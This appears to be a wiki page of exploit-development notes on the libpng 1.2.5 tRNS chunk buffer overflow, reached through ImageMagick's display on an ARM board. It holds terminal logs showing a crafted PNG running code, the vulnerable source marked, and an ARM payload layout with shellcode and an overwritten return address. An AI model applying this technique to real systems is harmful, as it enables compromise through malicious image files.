FrontPage > Armadillo-9 > exploit libpng
/tmp$ ls -la /tmp/itworked ls: /tmp/itworked: No such file or directory /tmp$ LD_PRELOAD="/home/katsuhiro/apps/libpng/libpng-1.2.5//libpng12.so" ./display_arm ./ex.png ./display_arm: /home/katsuhiro/apps/libpng/libpng-1.2.5//libpng12.so: no version information available (required by /usr/lib/libMagick.so.6) /tmp$ ls -la /tmp/itworked -rw-r--r-- 1 a users 0 Aug 22 12:11 /tmp/itworked
/tmp$ ls -la /tmp/itworked ls: /tmp/itworked: No such file or directory /tmp$ LD_PRELOAD="./libpng12.so.0" /tmp/display /tmp/exploit_i386.png /tmp/display: ./libpng12.so.0: no version information available (required by /usr/lib/libMagick.so.6) /tmp$ ls -la /tmp/itworked -rw-r--r-- 1 a a 0 Aug 15 02:34 /tmp/itworked
if (!(png_ptr->mode & PNG_HAVE_PLTE)) { /* Should be an error, but we can cope with it */ png_warning(png_ptr, "Missing PLTE before tRNS"); } else if (length > (png_uint_32)png_ptr->num_palette) //[!] { png_warning(png_ptr, "Incorrect tRNS chunk length"); png_crc_finish(png_ptr, length); return; } if (length == 0) { png_warning(png_ptr, "Zero length tRNS chunk"); png_crc_finish(png_ptr, length); return; } png_crc_read(png_ptr, readbuf, (png_size_t)length); //[!] png_ptr->num_trans = (png_uint_16)length;
static void PNGWarningHandler(png_struct *ping,png_const_charp message) { Image *image; if (LocaleCompare(message, "Missing PLTE before tRNS") == 0) //[!] png_error(ping, message); //[!] image=(Image *) png_get_error_ptr(ping); if (image->debug != MagickFalse) (void) LogMagickEvent(CoderEvent,GetMagickModule(), " libpng-%s warning: %s", PNG_LIBPNG_VER_STRING, message); (void) ThrowMagickException(&image->exception,GetMagickModule(),CoderWarning, message,image->filename); }
0x: [適当なデータ] 0x: [攻撃で使うデータ] 0x: [mov r5, pc] <- この地点の pc からの相対位置(r5 に入れる)で攻撃に用いるデータを参照する 0x: [攻撃コード] 0x: [上書きするリターンアドレスの値]
[r5]